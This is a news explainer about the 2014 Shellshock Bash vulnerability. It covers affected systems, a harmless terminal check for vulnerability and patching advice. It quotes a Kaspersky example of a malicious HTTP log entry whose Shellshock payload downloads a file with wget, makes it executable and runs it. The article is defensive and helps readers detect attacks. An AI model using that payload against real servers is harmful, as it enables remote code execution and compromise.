Shellshock

We explain everything about the Shellshock Bash bug and what you can do about it. What is Shellshock Bash bug? How to deal with Shellshock Bash bug.

Technology is always under the threat of viruses and security vulnerabilities. The latest one to hit the headlines is Shellshock so here's what you need to know about the Bash bug and what you can do about it. See all security software reviews

What is Shellshock and Bash?

Shellshock is a flaw in a software component known as Bash. The flaw allows malicious code-extension within the bash shell to take over an operating system and, in turn, gain access to any data on the machine.

Bash stands for 'Bourne Again Shell', which is a command line shell allowing users to launch applications by typing text commands.

Although the vulnerability has only just been discovered, Bash was released way back in 1989, so has been theoretically exploitable for the last 25 years. Read: The easiest way for criminals to hack your data may not be your PC.

Does Shellshock affect me?

Users running Linux and Mac OS X on their PCs are at risk. However, it's more likely that web servers running the Apache software running legacy scripts as CGI will be the target.

Although Windows is thought to be safe, Bitdefender says: "While it's hard to believe that the internet at large will be majorly affected by this Bash flaw as the patch will be soon made available, the attack could affect any system using the Bash Shell, including Windows."

How can I check if my system in vulnerable to Shellshock?

If you're worried about Shellshock, there is a simple check you can perform to see if your system is vulnerable. Open a terminal on your desktop and type the following command:

'env x='() { :;}; echo vulnerable' bash -c 'echo hello'

If your system is vulnerable, then you will see this message:

"vulnerable"
"hello"

If it is not vulnerable you will see this message:

"bash: warning: x: ignoring function definition attempt"
"bash: error importing function definition for 'x'"

Shellshock bug: What do I do now?

If you are shown the string 'vulnerable' when you run the above check then you should update your system and patch your bash version.

Kaspersky recommends that if you are using any IDS/IPS, you add/load a signature for this.  A lot of public rules have been published.

Also check your webserver configuration.  If there are any CGI scripts that you are not using, consider disabling them.

How to check if you are a victim of Shellshock

As well as checking whether you're vulnerable, you can review your HTTP logs to check for any suspicious activity. Kaspersky gives the following example of a malicious pattern.

"192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

"There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won’t prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system," added the firm.

Is it bigger than Heartbleed?

It's currently debatable whether Shellshock is bigger than Heartbleed. Around 500,000 machines were vulnerable to Heartbleed and early estimates suggest the Shellshock could hit 500 million, according to the BBC.

However, Bitdefender claims that this new threat is simply a 'mini-Heartbleed' because the exploitation is "only possible in certain scenarios on these systems".

"To start with, remote hackers can only target servers running CGI scripts and pass environment variables whereas, in Heartbleed’s case, they interacted more easily with the server. Network-based exploitation is also possible, but it is limited to specific scenarios," said Bogdan Botezatu, senior e-threat specialist at Bitdefender.